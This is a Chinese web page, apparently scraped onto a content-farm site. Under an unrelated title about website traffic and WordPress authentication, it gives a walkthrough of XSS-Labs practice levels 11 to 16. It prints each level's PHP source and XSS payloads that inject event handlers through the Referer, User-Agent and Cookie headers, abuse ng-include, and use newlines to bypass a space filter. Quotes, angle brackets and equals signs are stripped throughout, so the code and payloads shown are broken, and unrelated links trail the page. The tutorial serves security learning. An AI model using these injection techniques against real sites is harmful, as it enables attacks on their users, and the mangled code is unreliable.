当前位置: 首页 > news >正文

网站流量统计怎么做的wordpress api 自定义认证

网站流量统计怎么做的,wordpress api 自定义认证,成都手机网站建设报价,兼职做网站的费用君衍. 一、第十一关 referer参数注入二、第十二关 user-agent参数注入三、第十三关 cookie参数绕过四、第十五关 ng-include文件包含五、第十六关 回车代替空格 点击跳转#xff1a; XSS-Labs靶场“1-5”关通关教程 XSS-Labs靶场“6-10”关通关教程 一、第十一关 referer参数… 君衍. 一、第十一关 referer参数注入二、第十二关 user-agent参数注入三、第十三关 cookie参数绕过四、第十五关 ng-include文件包含五、第十六关 回车代替空格 点击跳转 XSS-Labs靶场“1-5”关通关教程 XSS-Labs靶场“6-10”关通关教程 一、第十一关 referer参数注入 这里我们猜测依旧是隐藏参数的话使用t_sort进行传参 我们可以看到这里依旧是无法完成绕过的所以我们猜测可能进行过滤所以查看源码 !DOCTYPE html!--STATUS OK--html head meta http-equivcontent-type contenttext/html;charsetutf-8 script window.alert function() { confirm(完成的不错);window.location.hreflevel12.php?keywordgood job!; } /script title欢迎来到level11/title /head body h1 aligncenter欢迎来到level11/h1 ?php ini_set(display_errors, 0); $str $_GET[keyword]; $str00 $_GET[t_sort]; $str11$_SERVER[HTTP_REFERER]; $str22str_replace(,,$str11); $str33str_replace(,,$str22); echo h2 aligncenter没有找到和.htmlspecialchars($str).相关的结果./h2.center form idsearch input namet_link value. typehidden input namet_history value. typehidden input namet_sort value.htmlspecialchars($str00). typehidden input namet_ref value.$str33. typehidden /form /center; ? centerimg srclevel11.png/center ?php echo h3 aligncenterpayload的长度:.strlen($str)./h3; ? /body /html这里我们即可看到隐藏参数并不是t_sortt_sort参数进行了过滤。所以这里是t_ref所以我们可以使用HTTP头中的referer参数进行注入。 可以使用hackbar扩展工具进行传参首先导入同时我们还可以使用Burp来抓包改包使用hackbar方便一点。 直接写入参数 οnclickalert(1) typetext查看源码 可以看到这里已经完成了绕过所以我们点击即可完成触发 二、第十二关 user-agent参数注入 本关我们直接分析源码查看注入点 !DOCTYPE html!--STATUS OK--html head meta http-equivcontent-type contenttext/html;charsetutf-8 script window.alert function() { confirm(完成的不错);window.location.hreflevel13.php?keywordgood job!; } /script title欢迎来到level12/title /head body h1 aligncenter欢迎来到level12/h1 ?php ini_set(display_errors, 0); $str $_GET[keyword]; $str00 $_GET[t_sort]; $str11$_SERVER[HTTP_USER_AGENT]; $str22str_replace(,,$str11); $str33str_replace(,,$str22); echo h2 aligncenter没有找到和.htmlspecialchars($str).相关的结果./h2.center form idsearch input namet_link value. typehidden input namet_history value. typehidden input namet_sort value.htmlspecialchars($str00). typehidden input namet_ua value.$str33. typehidden /form /center; ? centerimg srclevel12.png/center ?php echo h3 aligncenterpayload的长度:.strlen($str)./h3; ? /body /html可以看到本关和上一关差不多这里使用user-agent参数罢了所以我们直接上payload οnclickalert(1) typetext点击即可完成触发 三、第十三关 cookie参数绕过 同样的本关直接查看源码 !DOCTYPE html!--STATUS OK--html head meta http-equivcontent-type contenttext/html;charsetutf-8 script window.alert function() { confirm(完成的不错);window.location.hreflevel14.php; } /script title欢迎来到level13/title /head body h1 aligncenter欢迎来到level13/h1 ?php setcookie(user, call me maybe?, time()3600); ini_set(display_errors, 0); $str $_GET[keyword]; $str00 $_GET[t_sort]; $str11$_COOKIE[user]; $str22str_replace(,,$str11); $str33str_replace(,,$str22); echo h2 aligncenter没有找到和.htmlspecialchars($str).相关的结果./h2.center form idsearch input namet_link value. typehidden input namet_history value. typehidden input namet_sort value.htmlspecialchars($str00). typehidden input namet_cook value.$str33. typehidden /form /center; ? centerimg srclevel13.png/center ?php echo h3 aligncenterpayload的长度:.strlen($str)./h3; ? /body /html从源码中可以看到依旧是采用cookie可以完成注入 userοnclickalert(1) typetext点击即可完成触发 十四关由于文件地址失效无法完成测试 四、第十五关 ng-include文件包含 本关从界面查看没有什么信息只会看到一个可疑的注释掉的ng-include 所以单从一个ng-include还不能判断如何使用查看源码 html ng-app headmeta charsetutf-8script srcangular.min.js/script script window.alert function() { confirm(完成的不错);window.location.hreflevel16.php?keywordtest; } /script title欢迎来到level15/title /head h1 aligncenter欢迎来到第15关自己想个办法走出去吧/h1 p aligncenterimg srclevel15.png/p ?php ini_set(display_errors, 0); $str $_GET[src]; echo bodyspan classng-include:.htmlspecialchars($str)./span/body; ?所以我们将利用ng-include来包含外部的html文件使用引号来引用。 ?src./level1.php可以看到这里成功引入第一关同时这里需要注意路径。 以及保留了第一关的漏洞所以我们可以利用第一关的弹窗完成XSS注入 这个payload很多种这里只列举几种 ?src./level1.php?nameimg src1 οnclickalert(1)点击即可完成触发。 五、第十六关 回车代替空格 首先本关依旧是测试使用: scriptalert(1)/script我们可以看到进行了过滤所以我们查看源码 !DOCTYPE html!--STATUS OK--html head meta http-equivcontent-type contenttext/html;charsetutf-8 script window.alert function() { confirm(完成的不错);window.location.hreflevel17.php?arg01aarg02b; } /script title欢迎来到level16/title /head body h1 aligncenter欢迎来到level16/h1 ?php ini_set(display_errors, 0); $str strtolower($_GET[keyword]); $str2str_replace(script,nbsp;,$str); $str3str_replace( ,nbsp;,$str2); $str4str_replace(/,nbsp;,$str3); $str5str_replace( ,nbsp;,$str4); echo center.$str5./center; ? centerimg srclevel16.png/center ?php echo h3 aligncenterpayload的长度:.strlen($str5)./h3; ? /body /html首先接受一个名为 “keyword” 的GET参数。然后它会将接收到的参数值转换为小写并进行一系列的字符串替换操作。具体来说它将参数值中的 “script” 字符串替换为空格然后将空格替换为 将斜杠 “/” 替换为 将制表符 替换为空格。接着它会在页面中心显示经过替换后的参数值并在页面底部显示一个名为 “level16.png” 的图像。 所以这里我们可以使用回车代替空格回车url编码为%0a p%0Aonclickalert(1)aaa我们可以看到这里已经完成了绕过点击即可触发 img%0Asrc1%0Aonerroralert(1)
http://www.zqtcl.cn/news/581292/

相关文章:

  • vs做的本地网站甘肃省建设厅门户网站
  • 网站建设合同义务wordpress m1
  • 青海省建设局网站首页wordpress模板建站教程视频
  • 演示 又一个wordpress站点静态页面加wordpress
  • 企业做淘宝客网站有哪些有网站吗给一个
  • 深圳网站制作公司信息之梦与wordpress哪个好用
  • 免费搭建商城网站山西制作网站公司排名
  • 网站开发免费中建建设银行网站
  • 301重定向到新网站在线建站
  • 曰本做爰l网站沙朗做网站公司
  • 广州网站设计智能 乐云践新专家wordpress 头像设置
  • 电子商务学网站建设好吗佛山市手机网站建设企业
  • 为企业做网站电话开场白小说网站的里面的搜索是怎么做的
  • 深圳市设计网站公司自己做网站开网店
  • 智能建站cms管理系统修改wordpress时区
  • 站长怎么添加网站内容重庆网站推
  • 东莞网站建设属于什么专业网页设计代码书
  • 网站后台代码在哪修改wordpress添加搜索小工具
  • 爱站站长工具中国建设监理协会官方网站
  • 珠海微信网站开发东莞网站制作方案定制
  • 大学网站建设说明书记的网站域名
  • 网站如何开通支付功能第一ppt课件免费下载官网
  • 做1元夺宝网站挣钱吗美工网站设计收费
  • 华侨城网站开发wordpress页码颜色
  • 上海建站网络公司制作文字图片
  • 平台型网站制作网站建设张世勇
  • 网站建设云南网页游戏大厅都有哪些
  • 网站建设与管理报告书郑州建设银行网站
  • 做网站网页的人是不是思维公司网站建设包括
  • 网站建设都包括哪些网站后台如何上传文件